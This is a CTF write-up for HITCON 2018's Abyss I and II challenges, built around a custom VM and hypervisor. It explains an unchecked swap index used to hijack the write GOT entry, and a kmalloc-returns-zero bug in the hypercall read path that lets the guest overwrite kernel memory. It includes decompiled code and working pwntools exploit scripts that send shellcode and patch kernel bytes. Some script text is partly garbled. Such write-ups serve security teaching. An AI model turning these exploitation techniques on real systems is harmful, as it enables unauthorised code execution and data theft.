Rating: 4.0

# Abyss I II III
## Abyss I
* NX disable.
* `swap` function doesn't check the index, and the `machine` == `stack[-1]`.
void swap_()
unsigned int tmp;

tmp = stack[machine - 1];
stack[machine - 1] = stack[machine - 2];
stack[machine - 2] = tmp;
* We can control the value of `machine` by `swap()`.
p = '31' + 'a' + op['minus'] # -31
p += op['swap'] # stack point to write.got
p += 'a' + op['store'] # store the high 4 byte
p += str( 2107662 + 70 ) + op['add'] # add offset -> write.got point to our input
p += 'a' + op['fetch'] # recover high 4 byte
p += op['write'], # write() to jmp to our shellcode
* exploit:
#!/usr/bin/env python
from pwn import *

# hitcon{Go_ahead,_traveler,_and_get_ready_for_deeper_fear.}
# hitcon{take_out_all_memory,_take_away_your_soul}

context.arch = 'amd64'
host , port = '' , 31733
y = remote( host , port )

kernel = open( './kernel.bin' ).read()

s = '31a-\\a:2107732+a;,' + '\x90' * 70
s += asm(
shellcraft.pushstr( 'flag\x00' ) +
shellcraft.open( 'rsp' , 0 , 0 ) +
shellcraft.read( 'rax' , 'rsp' , 0x70 ) +
shellcraft.write( 1 , 'rsp' , 0x70 )

y.sendlineafter( 'down.' , s )

## Abyss II
* Part of code of `hypercall read handler` in Hypervisor:
rw((unsigned int)fd_map[fd].real_fd, *(_QWORD *)&vm->mem + buf, len);
Where `vm->mem` is our vm phisical address.
Kernel entry is 0, if we can let `but` == 0, so that we are able to overwrite the kernel memory.
Hypervisor will get the return value of kmalloc().
* `Hypercall read handler`:
vaddr = *(_DWORD *)(vm->run + *(_QWORD *)(vm->run + 40LL));
if ( (unsigned __int64)vaddr >= vm->mem_size )
__assert_fail("0 <= (offset) && (offset) < vm->mem_size", "hypercall.c", 0x7Eu, "handle_rw");
arg = (_QWORD *)(*(_QWORD *)&vm->mem + vaddr);
fd = *arg;
buf = arg[1];
len = arg[2];
if ( fd >= 0 && fd <= 255 && fd_map[fd].opening )
if ( buf >= vm->mem_size )
__assert_fail("0 <= (paddr) && (paddr) < vm->mem_size", "hypercall.c", 0x83u, "handle_rw");
read_ret = rw((unsigned int)fd_map[fd].real_fd, *(_QWORD *)&vm->mem + buf, len);
if ( read_ret < 0 )
read_ret = -*__errno_location();
read_ret = -9;
* Kernel sys_read():
signed __int64 __usercall sys_read@<rax>(__int64 size_@<rdx>, int fd_@<edi>, unsigned __int64 buf@<rsi>)
signed __int64 ret; // rbx
__int64 l; // r12
void *vbuf; // rbp
_QWORD *dst; // r13
__int64 paddr; // rsi
__int64 v8; // rcx

ret = -9i64;
if ( fd_ >= 0 )
l = size_;
vbuf = (void *)buf;
ret = -14i64;
if ( (unsigned int)access_ok(size_, 1, buf) )
dst = (_QWORD *)kmalloc(l, 0);
paddr = physical((signed __int64)dst);
ret = (signed int)hyper_read(l, v8, fd_, paddr);
if ( ret >= 0 )
qmemcpy(vbuf, dst, ret);
return ret;

__int64 __usercall hyper_read@<rax>(__int64 len@<rdx>, __int64 a2@<rcx>, int fd@<edi>, __int64 buf@<rsi>)
__int64 l; // r12
_QWORD *vaddr; // rax
_QWORD *v; // rbx
unsigned int paddr; // eax
unsigned int v8; // ST0C_4

l = len;
vaddr = (_QWORD *)kmalloc(0x18ui64, 0);
*vaddr = fd;
vaddr[1] = buf;
vaddr[2] = l;
v = vaddr;
paddr = physical((signed __int64)vaddr);
vmmcall(0x8001u, paddr);
return v8;
* Pass the return value of kmalloc() to hypervisor:
dst = (_QWORD *)kmalloc(l, 0);
paddr = physical((signed __int64)dst);
ret = (signed int)hyper_read(l, v8, fd_, paddr);
* Now our goal is to let `kmalloc` return 0 value.
* Kernel kmalloc():
signed __int64 __usercall kmalloc@<rax>(unsigned __int64 len@<rdi>, int align@<esi>)
unsigned __int64 nb; // r8
signed __int64 now; // rsi
signed __int64 v4; // rdx
unsigned __int64 now_size; // rax
bool equal; // zf
__int64 next; // rcx
signed __int64 ret; // rax
_QWORD *v9; // rcx
signed __int64 r; // [rsp+0h] [rbp-10h]

if ( len > 0xFFFFFFFF )
return 0i64;
nb = len + 16;
if ( ((_BYTE)len + 16) & 0x7F )
nb = (nb & 0xFFFFFFFFFFFFFF80ui64) + 0x80;
if ( align )
if ( align != 0x1000 )
hlt((unsigned __int64)"kmalloc.c#kmalloc: invalid alignment");
if ( !((0xFF0 - MEMORY[0x4840]) & 0xFFF) || malloc_top((0xFF0 - MEMORY[0x4840]) & 0xFFF) )
malloc_top(nb); // r
ret = r;
if ( r )
if ( !(r & 0xFFF) )
return ret;
hlt((unsigned __int64)"kmalloc.c#kmalloc: alignment request failed");
now = MEMORY[0x4860];
v4 = 0x4850i64;
while ( now )
now_size = *(_QWORD *)now;
if ( (unsigned __int64)(*(_QWORD *)now - 1i64) > 0xFFFFFFFE || now_size & 0xF )
hlt((unsigned __int64)"kmalloc.c: invalid size of sorted bin");
*(_QWORD *)(v4 + 16) = next;
if ( !equal )
*(_QWORD *)(now + nb) = now_size - nb;
insert_sorted((_QWORD *)(now + nb));
ret = now + 16;
*(_QWORD *)now = nb;
*(_OWORD *)(now + 8) = 0i64;
if ( now != -16 )
return ret;
equal = nb == now_size;
next = *(_QWORD *)(now + 16);
if ( nb <= now_size )
goto LABEL_12;
v4 = now;
now = *(_QWORD *)(now + 16);
ret = malloc_top(nb);
if ( ret )
return ret;
return 0i64;
* There are two conditions that `kmalloc` will return 0.
* len > 0xffffffff:
if ( len > 0xFFFFFFFF )
return 0i64;
* if kmalloc doesnt find the appropriate chunk in sorted bin, it will allocate from top by `malloc_top`.
ret = malloc_top(nb);
if ( ret )
return ret;
* If `malloc_top` return 0, it won't return 0 directly, but `kmalloc` will still return 0 in the end.
ret = malloc_top(nb);
if ( ret )
return ret;
return 0;
* We can not use the condition 1, because if we want to let the `len` to be 0x100000000, we need a memory space exactly has the 0x100000000 long space, due to `access_ok()` checking.
* We can't mmap that huge memory space.
* We have to go condition 2, let `malloc_top` return 0.
* `malloc_top`:
signed __int64 malloc_top(unsigned __int64 nb)
signed __int64 ret; // rax
__int64 top; // rax
unsigned __int64 new_top; // rdi

ret = 0;
if ( arena.top_size >= nb )
top = arena.top;
arena.top_size -= nb;
arena.top->size = nb;
new_top = arena.top + nb;
ret = arena.top + 16;
arena.top = new_top;
return ret;
* Just give a size which lager than `arena.top_size`, it will return 0.
1. `mmap(0, 0x1000000, 7)` -> `arena.top_size` remain the size < 0x1000000.
2. `sys_read( 0, buf, 0x1000000 )` -> `kmalloc` in `hypercall read` will return 0.
3. Pass 0 to hypervisor, `hypercall read handler` will do `read( 0, &vm->mem + 0 , 0x1000000 )`.
4. Now we can overwrite the whole kernel space!
* For flag2, I overwrite the opcodes in kernel `sys_open` which do checking filename with `nop`.
* ORW flag2.
* exploit:
#!/usr/bin/env python
from pwn import *

# hitcon{Go_ahead,_traveler,_and_get_ready_for_deeper_fear.}
# hitcon{take_out_all_memory,_take_away_your_soul}

context.arch = 'amd64'
host , port = '' , 31733
y = remote( host , port )

kernel = open( './kernel.bin' ).read()

s = '31a-\\a:2107732+a;,' + '\x90' * 70
s += asm(
mov rdi, 0
mov rsi, 0x1000000
mov rdx, 7
mov r10, 16
mov r8, -1
mov r9, 0
mov rax, 8
inc rax

mov rbp, rax
push rsp
''' +
shellcraft.write( 1 , 'rsp' , 8 ) +
shellcraft.read( 0 , 'rbp' , 0x1000000 ) +
shellcraft.pushstr( 'flag2\x00' ) +
shellcraft.open( 'rsp' , 0 , 0 ) +
shellcraft.read( 'rax' , 'rsp' , 0x70 ) +
shellcraft.write( 1 , 'rsp' , 0x70 )

y.sendlineafter( 'down.' , s )
user_stack = u64( y.recv(8) )
success( 'User stack -> %s' % hex( user_stack ) )

kernel_mod = kernel[:0x14d] + p64( 0x8002000000 ) + p64( user_stack + 0x100 )
kernel_mod += kernel[0x15d:0x9a4] + '\x90' * 0x75

y.send( kernel_mod )


Original writeup (https://github.com/ssspeedgit00/CTF/tree/master/2018/HITCON_CTF/Abyss_I_II_III).